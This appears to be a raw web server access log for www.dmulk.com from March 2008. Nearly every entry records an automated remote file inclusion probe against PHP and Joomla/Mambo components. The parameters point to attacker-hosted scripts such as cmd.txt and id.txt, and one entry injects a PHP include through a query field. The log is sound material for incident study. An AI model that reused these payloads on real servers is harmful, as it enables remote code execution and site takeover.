212.85.12.121 - - [13/Mar/2008:06:47:17 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:47:17 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
205.234.242.100 - - [13/Mar/2008:06:47:48 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [13/Mar/2008:06:47:48 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [13/Mar/2008:06:47:48 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:47:49 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:47:50 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:47:50 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.235.74 - - [13/Mar/2008:06:48:49 -0700] "GET /logs/access_080215.log/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [13/Mar/2008:06:48:49 -0700] "GET /logs/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.220.146.59 - - [13/Mar/2008:06:49:26 -0700] "GET /logs/access_080220.log/?mosConfig_absolute_path=http://www.sel-de-re.tm.fr/boutique/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.220.146.59 - - [13/Mar/2008:06:49:27 -0700] "GET /?mosConfig_absolute_path=http://www.sel-de-re.tm.fr/boutique/cache/id.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
62.220.146.59 - - [13/Mar/2008:06:49:28 -0700] "GET /logs/?mosConfig_absolute_path=http://www.sel-de-re.tm.fr/boutique/cache/id.txt?? HTTP/1.1" 200 38547 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.112.178 - - [13/Mar/2008:06:49:28 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://angel.yum.pl/joomla/templates/head.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.112.178 - - [13/Mar/2008:06:49:29 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://angel.yum.pl/joomla/templates/head.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.112.178 - - [13/Mar/2008:06:49:29 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://angel.yum.pl/joomla/templates/head.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.200 - - [13/Mar/2008:06:50:09 -0700] "GET //routines/fieldValidation.php?jssShopFileSystem=http://treff-erotik.com/sub-treff/images/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.8.218.185 - - [13/Mar/2008:06:50:36 -0700] "GET /logs/access_080119.log/modules/My_eGallery/index.php?basepath=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.15.196.106 - - [13/Mar/2008:06:50:42 -0700] "GET /logs//modules/feedback/block.feedback.php?where_cms=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.15.196.106 - - [13/Mar/2008:06:50:42 -0700] "GET //modules/feedback/block.feedback.php?where_cms=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:06:51:10 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [13/Mar/2008:06:51:22 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
72.15.196.106 - - [13/Mar/2008:06:51:22 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
213.254.214.3 - - [13/Mar/2008:06:51:39 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [13/Mar/2008:06:52:16 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:53:40 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:53:41 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:53:41 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.15 - - [13/Mar/2008:06:54:04 -0700] "GET /logs/access_080306.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:54:59 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:54:59 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:54:59 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.12.14 - - [13/Mar/2008:06:55:34 -0700] "GET /logs/access_070808.log HTTP/1.0" 200 84948 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.121.50.114 - - [13/Mar/2008:06:56:01 -0700] "GET /modules/my_egallery/index.php?do=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:56:06 -0700] "GET /logs/access_080225.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.73.186 - - [13/Mar/2008:06:57:22 -0700] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.73.186 - - [13/Mar/2008:06:57:22 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.73.186 - - [13/Mar/2008:06:57:22 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.73.186 - - [13/Mar/2008:06:57:22 -0700] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:57:24 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:06:57:47 -0700] "GET /logs/access_080225.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.tecnicsuport.com/dades/gestiobanners/.ms/iyes.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.13.19.21 - - [13/Mar/2008:06:59:09 -0700] "GET /logsaccess.log HTTP/1.0" 404 275 "-" "Wget/1.5.3.1" "dmulk.com"
72.15.196.106 - - [13/Mar/2008:06:59:31 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
72.15.196.106 - - [13/Mar/2008:06:59:31 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:06:59:44 -0700] "GET //calendar.php?pftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.29.75.45 - - [13/Mar/2008:06:59:44 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.29.75.45 - - [13/Mar/2008:06:59:44 -0700] "GET /errors.php?error=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.29.75.45 - - [13/Mar/2008:06:59:45 -0700] "GET /logs/errors.php?error=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.112.178 - - [13/Mar/2008:07:00:19 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://angel.yum.pl/joomla/templates/head.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.205.133 - - [13/Mar/2008:07:00:24 -0700] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.205.133 - - [13/Mar/2008:07:00:25 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.205.133 - - [13/Mar/2008:07:00:25 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.205.133 - - [13/Mar/2008:07:00:25 -0700] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:07:00:38 -0700] "GET /admin.php?include_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:07:00:38 -0700] "GET /logs/admin.php?include_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
124.217.247.200 - - [13/Mar/2008:07:01:15 -0700] "GET /logs/access_080120.log//routines/fieldValidation.php?jssShopFileSystem=http://treff-erotik.com/sub-treff/images/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.200 - - [13/Mar/2008:07:01:15 -0700] "GET /logs//routines/fieldValidation.php?jssShopFileSystem=http://treff-erotik.com/sub-treff/images/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:07:03:19 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:07:03:19 -0700] "GET /errors.php?error=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [13/Mar/2008:07:03:25 -0700] "GET /logs/errors.php?error=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.54.187.234 - - [13/Mar/2008:07:04:23 -0700] "GET /logs/a.phphttp://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
88.54.187.234 - - [13/Mar/2008:07:04:23 -0700] "GET /a.phphttp://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
209.121.50.114 - - [13/Mar/2008:07:05:05 -0700] "GET /logs/access_080126.log/modules/my_egallery/index.php?do=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.121.50.114 - - [13/Mar/2008:07:05:05 -0700] "GET /logs/modules/my_egallery/index.php?do=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.121.50.114 - - [13/Mar/2008:07:05:07 -0700] "GET /logs/access_080225.log/modules/my_egallery/index.php?do=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.99.130 - - [13/Mar/2008:07:06:05 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.61.99.130 - - [13/Mar/2008:07:06:05 -0700] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=ftp://85.25.48.60/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.221.157.210 - - [13/Mar/2008:07:08:18 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://justinpta.org/calogic122/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:07:10:48 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:07:10:48 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.71.91 - - [13/Mar/2008:07:12:12 -0700] "GET /port.php?content=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.71.183.50 - - [13/Mar/2008:07:13:12 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://video.exnet.gr/templates/id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
206.71.183.50 - - [13/Mar/2008:07:13:12 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://video.exnet.gr/templates/id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:07:14:17 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.71.91 - - [13/Mar/2008:07:15:55 -0700] "GET /logs/access_080207.log/port.php?content=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.91 - - [13/Mar/2008:07:15:55 -0700] "GET /logs/port.php?content=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.91 - - [13/Mar/2008:07:15:55 -0700] "GET /logs/access_080215.log/port.php?content=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.143.44 - - [13/Mar/2008:07:15:58 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://213.184.65.80/incoming/upload/trop/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.84.65 - - [13/Mar/2008:07:17:17 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:07:17:25 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:07:17:26 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:07:17:27 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.221.157.210 - - [13/Mar/2008:07:18:12 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://justinpta.org/calogic122/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [13/Mar/2008:07:18:18 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://justinpta.org/calogic122/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.163.42 - - [13/Mar/2008:07:19:52 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:07:21:33 -0700] "GET /logs/access_080122.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:07:21:33 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [13/Mar/2008:07:21:33 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://grouprills.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.254.214.3 - - [13/Mar/2008:07:22:03 -0700] "GET /logs/access_080108.log//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [13/Mar/2008:07:22:04 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:07:22:58 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
212.85.12.121 - - [13/Mar/2008:07:23:03 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
72.26.226.138 - - [13/Mar/2008:07:23:56 -0700] "GET /logs/access_080128.log/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.26.226.138 - - [13/Mar/2008:07:23:56 -0700] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.26.226.138 - - [13/Mar/2008:07:23:56 -0700] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.111.80.220 - - [13/Mar/2008:07:24:13 -0700] "GET /logs/access_080128.log/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.111.80.220 - - [13/Mar/2008:07:24:13 -0700] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.111.80.220 - - [13/Mar/2008:07:24:14 -0700] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.36.146 - - [13/Mar/2008:07:24:34 -0700] "GET /logs/access_080119.log/modules/my_egallery/index.php?do=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.235.253.6 - - [13/Mar/2008:07:24:42 -0700] "GET /logs/access_080128.log/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.235.253.6 - - [13/Mar/2008:07:24:43 -0700] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.235.253.6 - - [13/Mar/2008:07:24:44 -0700] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.26.226.138 - - [13/Mar/2008:07:24:54 -0700] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [13/Mar/2008:07:25:03 -0700] "GET /logs/access_080131.log//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.26.226.138 - - [13/Mar/2008:07:25:43 -0700] "GET /logs/access_080117.log/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.111.80.220 - - [13/Mar/2008:07:26:14 -0700] "GET /logs/access_080117.log/administrator/components/com_jreactions/langset.php?comPath=http://www.themaciom.com/guestbook/.dev12/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.31.157.8 - - [13/Mar/2008:07:26:22 -0700] "GET /logs/access_080128.log/administrator/components/com_jreactions/langset.php?comPath=http://www.kampeermarkt.com/php_content/shop/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.31.157.8 - - [13/Mar/2008:07:26:24 -0700] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.kampeermarkt.com/php_content/shop/.a/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
